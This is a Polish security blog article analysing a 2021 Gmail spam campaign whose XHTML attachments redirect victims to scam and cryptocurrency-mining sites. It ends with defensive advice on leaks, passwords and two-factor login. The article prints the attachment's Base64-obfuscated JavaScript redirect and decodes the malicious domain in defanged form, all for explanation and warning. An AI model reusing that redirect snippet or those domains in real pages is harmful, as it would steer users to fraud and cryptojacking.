IP QO QP LA ZF KG UQ OD – Dostajesz taki spam na pocztę GMail?

25 października, 2021

Qa Ljdwq Icu Addih Dsfz, IQ IO FR VP LY TW PW QE XC, IP QO QP LA ZF KG UQ OD… To tylko trzy wybrane tytuły wiadomości mailowych, które dostarczane są na skrzynki odbiorcze w domenie GMail.com pomimo filtrów antyspamowych Google. Spam w pierwszych chwilach analizy wygląda bardzo tajemniczo, prawda? Co tak naprawdę ukrywa się w środku?

Wiadomość email, którą otrzymują tysiące niezadowolonych Polaków.
Wiadomość email, którą otrzymują tysiące niezadowolonych Polaków.

Jednorazowo wiadomość dostarczana jest do około 18-20 użytkowników i niestety w każdym przypadku dochodzi do ponownego ujawnienia adresów pocztowych wszystkich odbiorców. Do pustej treści dołączany jest jeden pliki XHTML, którego interpretują przeglądarki internetowe:

document.location.href=window.atob('aHR0cHM6Ly9nc3AuYnRjbWluaW56LnNpdGU/MTczMzYgIA==')

W środku znajdujemy część zakodowanego tekstu w Base64. Używając dostępnych dekoderów online, szybko dowiadujemy się, że otworzenie załącznika (pliki XHTML są skojarzone z domyślną przeglądarką) poprowadzi ofiarę do stron z oszustwami i elementami odpowiedzialnymi za kopanie kryptowaluty Bitcoin.

Jedna z zakodowanych domen w pliku XHTML:

'aHR0cHM6Ly9nc3AuYnRjbWluaW56LnNpdGU/MTczMzYgIA==

Po zdekodowaniu:

hxxps://gsp.btcmininz.site?17336

W spamie pojawiają się podobne strony np. „btcminings.site?11784721753”. Większość z tych domen obecnie prowadzi do skryptów JavaScript używanych do generowania kryptowalut.

Niektóre przeglądarki, w tym Mozilla Firefox, domyślnie blokują tego typu zagrożenia sieciowe. Oszuści nie mają łatwo, ponieważ konieczna jest interakcja z użytkownikiem, aby zezwolić stronie internetowej na używanie zasobów komputera.

Całkiem nieźle działają zabezpieczenia programów antywirusowych, także usługa Google Safe Browsing, która jest wbudowana w popularne przeglądarki. Zadaniem tej usługi jest blokowanie złośliwych stron internetowych za pośrednictwem filtrów Google.

Wiadomości ze scamem dostarczane są do użytkowników z Polski (i nie tylko) z powodu wycieków danych, które zdarzały się w przeszłości. Przypomnijmy chociażby te największe:

  • Wyciek danych 2,6 miliona polskich użytkowników z Facebooka (dziesiątki milionów z całego świata).
  • Klientów Audi i Volkswagena.
  • Wycieki klientów banku.
  • Niepozorne wydobywanie kontaktów z poczty
  • Wyciek danych znaczącej populacji

Konsekwencje wycieków danych

Nie pozostają bez konsekwencji wycieki mniejszych podmiotów, sklepów internetowych, forów internetowych itp. Ostatecznie nie ma właściwej drogi obrony przed otrzymywaniem wyżej opisanego spamu.

Zaleca się oznaczanie wiadomości jako SPAM, aby algorytm Google szybciej nauczył się wzorców i blokował podobne oszustwa. Można też spróbować dowiedzieć się skąd konkretnie pochodzi wyciek, ale nie będzie to jednoznaczne. Pomocne będą usługi HaveIBeenPwned i w szczególności F-Secure Identity Theft Checker (zobacz porównanie obu).

Wynik skanowania adresu e-mail. F-Secure wskazuje na potencjalne wycieki.
Wynik skanowania adresu e-mail. F-Secure wskazuje na potencjalne wycieki.

Wycieki danych zdarzały się i będą się zdarzać. Najważniejsze w tym wszystkim jest to, aby z każdego ujawnienia danych, a także kampanii ze scamem, nauczyć się czegoś nowego.

Po każdym wycieku trzeba zmieniać hasła. Wszędzie gdzie jest to możliwe należy aktywować dwuskładnikowe logowanie. Najlepiej zrobić to teraz, bez względu na to, czy doszło do zhackowania strony internetowej, którą często odwiedzasz.

Po odtajnieniu wrażliwych danych, takich jak adresy e-mail, kwestią czasu jest kiedy cyberprzestępcy wykorzystają je przeciwko ofiarom. Wykradzione bazy danych z cyberataków mogą być sprzedawane na forach (a nawet udostępniane za darmo) i używane do kolejnych oszustw, kradzieży tożsamości, szantażu.

Bądźcie czujni i ostrożni!

,

Czy ten artykuł był pomocny?

Oceniono: 3 razy

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]